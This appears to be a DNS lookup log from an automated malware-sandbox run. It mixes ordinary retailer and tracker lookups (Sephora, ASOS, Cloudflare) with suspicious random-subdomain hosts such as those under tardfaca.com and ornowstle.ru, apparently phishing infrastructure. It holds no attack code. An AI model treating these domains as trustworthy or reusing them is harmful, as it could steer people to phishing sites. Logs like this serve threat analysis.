                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.363383055 CEST192.168.2.161.1.1.10x6f6bStandard query (0)cdn.optimizely.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.363497019 CEST192.168.2.161.1.1.10xb2c0Standard query (0)cdn.optimizely.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.446861029 CEST192.168.2.161.1.1.10x8a37Standard query (0)a19065870423.cdn.optimizely.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.447227955 CEST192.168.2.161.1.1.10x4d98Standard query (0)a19065870423.cdn.optimizely.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.278955936 CEST192.168.2.161.1.1.10xa566Standard query (0)static.cloudflareinsights.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.279140949 CEST192.168.2.161.1.1.10x8be8Standard query (0)static.cloudflareinsights.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.432733059 CEST192.168.2.161.1.1.10xb662Standard query (0)logx.optimizely.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.432889938 CEST192.168.2.161.1.1.10xcbe4Standard query (0)logx.optimizely.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.546878099 CEST192.168.2.161.1.1.10xb22aStandard query (0)static.cloudflareinsights.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.547070026 CEST192.168.2.161.1.1.10x6463Standard query (0)static.cloudflareinsights.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:41.062391996 CEST192.168.2.161.1.1.10xbf7dStandard query (0)geolocation.onetrust.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:41.062530041 CEST192.168.2.161.1.1.10x4b2Standard query (0)geolocation.onetrust.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:41.946675062 CEST192.168.2.161.1.1.10x52c5Standard query (0)geolocation.onetrust.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:41.946808100 CEST192.168.2.161.1.1.10xf489Standard query (0)geolocation.onetrust.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:44.410024881 CEST192.168.2.161.1.1.10xefa2Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:44.410644054 CEST192.168.2.161.1.1.10x991dStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:40.394831896 CEST1.1.1.1192.168.2.160x2e70No error (0)www.google.co.uk65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:40.395350933 CEST1.1.1.1192.168.2.160x3a1eNo error (0)www.google.co.uk142.250.186.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:42.167109966 CEST1.1.1.1192.168.2.160x483aNo error (0)we4uproducts.com213.5.71.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:43.099525928 CEST1.1.1.1192.168.2.160x1193No error (0)fkmd.lioninkey.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:43.099525928 CEST1.1.1.1192.168.2.160x1193No error (0)fkmd.lioninkey.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:43.103105068 CEST1.1.1.1192.168.2.160x9ccfNo error (0)fkmd.lioninkey.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:44.310930967 CEST1.1.1.1192.168.2.160x90b3No error (0)www.google.com142.250.184.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:44.311122894 CEST1.1.1.1192.168.2.160x6672No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:45.220453024 CEST1.1.1.1192.168.2.160x2ca8No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:45.220453024 CEST1.1.1.1192.168.2.160x2ca8No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:45.220453024 CEST1.1.1.1192.168.2.160x2ca8No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:45.220453024 CEST1.1.1.1192.168.2.160x2ca8No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:45.221339941 CEST1.1.1.1192.168.2.160x6725No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:45.221432924 CEST1.1.1.1192.168.2.160xc2d7No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:45.221678019 CEST1.1.1.1192.168.2.160xd5b3No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:45.221678019 CEST1.1.1.1192.168.2.160xd5b3No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:45.222121000 CEST1.1.1.1192.168.2.160xc080No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:45.222121000 CEST1.1.1.1192.168.2.160xc080No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.366303921 CEST1.1.1.1192.168.2.160xa15No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.367218971 CEST1.1.1.1192.168.2.160x4930No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.367218971 CEST1.1.1.1192.168.2.160x4930No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.657388926 CEST1.1.1.1192.168.2.160xe02No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.657388926 CEST1.1.1.1192.168.2.160xe02No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.657388926 CEST1.1.1.1192.168.2.160xe02No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.657388926 CEST1.1.1.1192.168.2.160xe02No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.162529945 CEST1.1.1.1192.168.2.160x8ab1No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.162863016 CEST1.1.1.1192.168.2.160x7d72No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.162863016 CEST1.1.1.1192.168.2.160x7d72No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.174789906 CEST1.1.1.1192.168.2.160x6900No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.174789906 CEST1.1.1.1192.168.2.160x6900No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.175152063 CEST1.1.1.1192.168.2.160x9cd5No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.709681034 CEST1.1.1.1192.168.2.160xdc23No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:59.146825075 CEST1.1.1.1192.168.2.160x9856No error (0)cugobbs97qwf9gjbojuj9yxf6kyyiytmg8lbt4cjoujssnl01j4essytivo.tardfaca.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:59.203389883 CEST1.1.1.1192.168.2.160x487No error (0)cugobbs97qwf9gjbojuj9yxf6kyyiytmg8lbt4cjoujssnl01j4essytivo.tardfaca.com172.67.222.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:59.203389883 CEST1.1.1.1192.168.2.160x487No error (0)cugobbs97qwf9gjbojuj9yxf6kyyiytmg8lbt4cjoujssnl01j4essytivo.tardfaca.com104.21.67.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:01.293118000 CEST1.1.1.1192.168.2.160x3099No error (0)cugobbs97qwf9gjbojuj9yxf6kyyiytmg8lbt4cjoujssnl01j4essytivo.tardfaca.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:01.293804884 CEST1.1.1.1192.168.2.160x27caNo error (0)www.sephora.comwww.sephora.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:01.294601917 CEST1.1.1.1192.168.2.160xce6cNo error (0)www.sephora.comwww.sephora.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:01.323523045 CEST1.1.1.1192.168.2.160x29bfNo error (0)cugobbs97qwf9gjbojuj9yxf6kyyiytmg8lbt4cjoujssnl01j4essytivo.tardfaca.com172.67.222.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:01.323523045 CEST1.1.1.1192.168.2.160x29bfNo error (0)cugobbs97qwf9gjbojuj9yxf6kyyiytmg8lbt4cjoujssnl01j4essytivo.tardfaca.com104.21.67.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.440299034 CEST1.1.1.1192.168.2.160xec92No error (0)www.google.com142.250.184.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.440334082 CEST1.1.1.1192.168.2.160x5982No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.451782942 CEST1.1.1.1192.168.2.160xc3acNo error (0)cnstrc.com99.86.4.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.451782942 CEST1.1.1.1192.168.2.160xc3acNo error (0)cnstrc.com99.86.4.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.451782942 CEST1.1.1.1192.168.2.160xc3acNo error (0)cnstrc.com99.86.4.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.451782942 CEST1.1.1.1192.168.2.160xc3acNo error (0)cnstrc.com99.86.4.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.464452028 CEST1.1.1.1192.168.2.160x8121No error (0)e309da9b9aaf.cdn4.forter.com18.245.86.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.464452028 CEST1.1.1.1192.168.2.160x8121No error (0)e309da9b9aaf.cdn4.forter.com18.245.86.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.464452028 CEST1.1.1.1192.168.2.160x8121No error (0)e309da9b9aaf.cdn4.forter.com18.245.86.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.464452028 CEST1.1.1.1192.168.2.160x8121No error (0)e309da9b9aaf.cdn4.forter.com18.245.86.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.488156080 CEST1.1.1.1192.168.2.160x1976No error (0)api.bluecore.comgke-ingress.bluecore.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.488156080 CEST1.1.1.1192.168.2.160x1976No error (0)gke-ingress.bluecore.com35.190.19.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.500474930 CEST1.1.1.1192.168.2.160xa8a2No error (0)sephora-track.inside-graph.comsephora-track.inside-graph.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.502239943 CEST1.1.1.1192.168.2.160x69b8No error (0)api.bluecore.comgke-ingress.bluecore.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.504940987 CEST1.1.1.1192.168.2.160x1ce8No error (0)assets.adobedtm.comcn-assets.adobedtm.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.506108046 CEST1.1.1.1192.168.2.160x9187No error (0)assets.adobedtm.comcn-assets.adobedtm.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.508450985 CEST1.1.1.1192.168.2.160x444aNo error (0)sephora-track.inside-graph.comsephora-track.inside-graph.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.511858940 CEST1.1.1.1192.168.2.160x9df2No error (0)js-cdn.dynatrace.com18.244.18.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.511858940 CEST1.1.1.1192.168.2.160x9df2No error (0)js-cdn.dynatrace.com18.244.18.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.511858940 CEST1.1.1.1192.168.2.160x9df2No error (0)js-cdn.dynatrace.com18.244.18.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.511858940 CEST1.1.1.1192.168.2.160x9df2No error (0)js-cdn.dynatrace.com18.244.18.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.534392118 CEST1.1.1.1192.168.2.160x182bNo error (0)sephora.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.534392118 CEST1.1.1.1192.168.2.160x182bNo error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.534392118 CEST1.1.1.1192.168.2.160x182bNo error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.542911053 CEST1.1.1.1192.168.2.160xf09dNo error (0)sephora.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.542911053 CEST1.1.1.1192.168.2.160xf09dNo error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.542911053 CEST1.1.1.1192.168.2.160xf09dNo error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.542911053 CEST1.1.1.1192.168.2.160xf09dNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com18.203.166.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.542911053 CEST1.1.1.1192.168.2.160xf09dNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com63.35.71.243A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.542911053 CEST1.1.1.1192.168.2.160xf09dNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.217.253.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.542911053 CEST1.1.1.1192.168.2.160xf09dNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.210.142.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.542911053 CEST1.1.1.1192.168.2.160xf09dNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.214.221.135A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.542911053 CEST1.1.1.1192.168.2.160xf09dNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.48.129.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.542911053 CEST1.1.1.1192.168.2.160xf09dNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.72.42.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.542911053 CEST1.1.1.1192.168.2.160xf09dNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.229.50.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.714330912 CEST1.1.1.1192.168.2.160xf612No error (0)community.sephora.comsephora.lithium.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.714330912 CEST1.1.1.1192.168.2.160xf612No error (0)sephora.lithium.comdycxm6nnyo2aj.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.763834000 CEST1.1.1.1192.168.2.160xdf80No error (0)community.sephora.comsephora.lithium.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.763834000 CEST1.1.1.1192.168.2.160xdf80No error (0)sephora.lithium.comdycxm6nnyo2aj.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.763834000 CEST1.1.1.1192.168.2.160xdf80No error (0)dycxm6nnyo2aj.cloudfront.net18.66.102.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.763834000 CEST1.1.1.1192.168.2.160xdf80No error (0)dycxm6nnyo2aj.cloudfront.net18.66.102.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.763834000 CEST1.1.1.1192.168.2.160xdf80No error (0)dycxm6nnyo2aj.cloudfront.net18.66.102.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:02.763834000 CEST1.1.1.1192.168.2.160xdf80No error (0)dycxm6nnyo2aj.cloudfront.net18.66.102.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:03.999394894 CEST1.1.1.1192.168.2.160xe19aNo error (0)community.sephora.comsephora.lithium.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:03.999394894 CEST1.1.1.1192.168.2.160xe19aNo error (0)sephora.lithium.comdycxm6nnyo2aj.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:03.999394894 CEST1.1.1.1192.168.2.160xe19aNo error (0)dycxm6nnyo2aj.cloudfront.net18.66.102.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:03.999394894 CEST1.1.1.1192.168.2.160xe19aNo error (0)dycxm6nnyo2aj.cloudfront.net18.66.102.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:03.999394894 CEST1.1.1.1192.168.2.160xe19aNo error (0)dycxm6nnyo2aj.cloudfront.net18.66.102.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:03.999394894 CEST1.1.1.1192.168.2.160xe19aNo error (0)dycxm6nnyo2aj.cloudfront.net18.66.102.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:04.181670904 CEST1.1.1.1192.168.2.160x37a7No error (0)www.sephora.comwww.sephora.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:04.183015108 CEST1.1.1.1192.168.2.160xe92eNo error (0)www.sephora.comwww.sephora.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:04.365272999 CEST1.1.1.1192.168.2.160xf73cNo error (0)community.sephora.comsephora.lithium.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:04.365272999 CEST1.1.1.1192.168.2.160xf73cNo error (0)sephora.lithium.comdycxm6nnyo2aj.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:07.477799892 CEST1.1.1.1192.168.2.160x81f1No error (0)r1uobwimx4bmcqjx1tntpxzrsxndswjyzzab0epewnu1wq7tcw6y0hbumhbq.ornowstle.ru65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:07.648710012 CEST1.1.1.1192.168.2.160x7602No error (0)r1uobwimx4bmcqjx1tntpxzrsxndswjyzzab0epewnu1wq7tcw6y0hbumhbq.ornowstle.ru104.21.49.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:07.648710012 CEST1.1.1.1192.168.2.160x7602No error (0)r1uobwimx4bmcqjx1tntpxzrsxndswjyzzab0epewnu1wq7tcw6y0hbumhbq.ornowstle.ru172.67.166.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:09.881714106 CEST1.1.1.1192.168.2.160xd27dNo error (0)www.asos.comsnir.www.asos.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:09.882287979 CEST1.1.1.1192.168.2.160x6954No error (0)www.asos.comsnir.www.asos.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:09.924896955 CEST1.1.1.1192.168.2.160x6cc2No error (0)r1uobwimx4bmcqjx1tntpxzrsxndswjyzzab0epewnu1wq7tcw6y0hbumhbq.ornowstle.ru104.21.49.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:09.924896955 CEST1.1.1.1192.168.2.160x6cc2No error (0)r1uobwimx4bmcqjx1tntpxzrsxndswjyzzab0epewnu1wq7tcw6y0hbumhbq.ornowstle.ru172.67.166.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:10.159285069 CEST1.1.1.1192.168.2.160x3150No error (0)r1uobwimx4bmcqjx1tntpxzrsxndswjyzzab0epewnu1wq7tcw6y0hbumhbq.ornowstle.ru65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:11.162625074 CEST1.1.1.1192.168.2.160xd64cNo error (0)content.asos-media.comsnir.asos-media.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:11.163631916 CEST1.1.1.1192.168.2.160x2e6aNo error (0)content.asos-media.comsnir.asos-media.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:11.164114952 CEST1.1.1.1192.168.2.160xf70No error (0)images.asos-media.comsnir.asos-media.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:11.164208889 CEST1.1.1.1192.168.2.160x43a9No error (0)images.asos-media.comsnir.asos-media.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:11.164354086 CEST1.1.1.1192.168.2.160xde77No error (0)www.asos-video.comwww.asos-video.com.multicdn.cloudinary.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:11.164354086 CEST1.1.1.1192.168.2.160xde77No error (0)www.asos-video.com.multicdn.cloudinary.com2-01-49b5-08e7.cdx.cedexis.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:11.164354086 CEST1.1.1.1192.168.2.160xde77No error (0)s2-cloudinary-pin-sni.map.fastly.net151.101.130.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:11.164354086 CEST1.1.1.1192.168.2.160xde77No error (0)s2-cloudinary-pin-sni.map.fastly.net151.101.194.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:11.164354086 CEST1.1.1.1192.168.2.160xde77No error (0)s2-cloudinary-pin-sni.map.fastly.net151.101.2.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:11.164354086 CEST1.1.1.1192.168.2.160xde77No error (0)s2-cloudinary-pin-sni.map.fastly.net151.101.66.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:11.166080952 CEST1.1.1.1192.168.2.160x9554No error (0)www.asos-video.comwww.asos-video.com.multicdn.cloudinary.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:11.166080952 CEST1.1.1.1192.168.2.160x9554No error (0)www.asos-video.com.multicdn.cloudinary.com2-01-49b5-08e7.cdx.cedexis.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:11.173584938 CEST1.1.1.1192.168.2.160x558eNo error (0)assets.asosservices.comsnir.asosservices.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:11.173670053 CEST1.1.1.1192.168.2.160x7de3No error (0)assets.asosservices.comsnir.asosservices.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:11.184823990 CEST1.1.1.1192.168.2.160xae66No error (0)cdn.optimizely.com104.18.65.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:11.184823990 CEST1.1.1.1192.168.2.160xae66No error (0)cdn.optimizely.com104.18.66.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:11.185107946 CEST1.1.1.1192.168.2.160x379eNo error (0)cdn.optimizely.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:11.185556889 CEST1.1.1.1192.168.2.160xeaebNo error (0)my.asos.comsnir.www.asos.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:11.186995983 CEST1.1.1.1192.168.2.160xdb0eNo error (0)my.asos.comsnir.www.asos.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:11.187702894 CEST1.1.1.1192.168.2.160x992bNo error (0)ci.asosservices.comsnir.asosservices.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:11.189083099 CEST1.1.1.1192.168.2.160xfa2fNo error (0)ci.asosservices.comsnir.asosservices.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:11.198589087 CEST1.1.1.1192.168.2.160xd6b9No error (0)res.cloudinary.comresc.cloudinary.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:11.199619055 CEST1.1.1.1192.168.2.160xf590No error (0)res.cloudinary.comresc.cloudinary.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
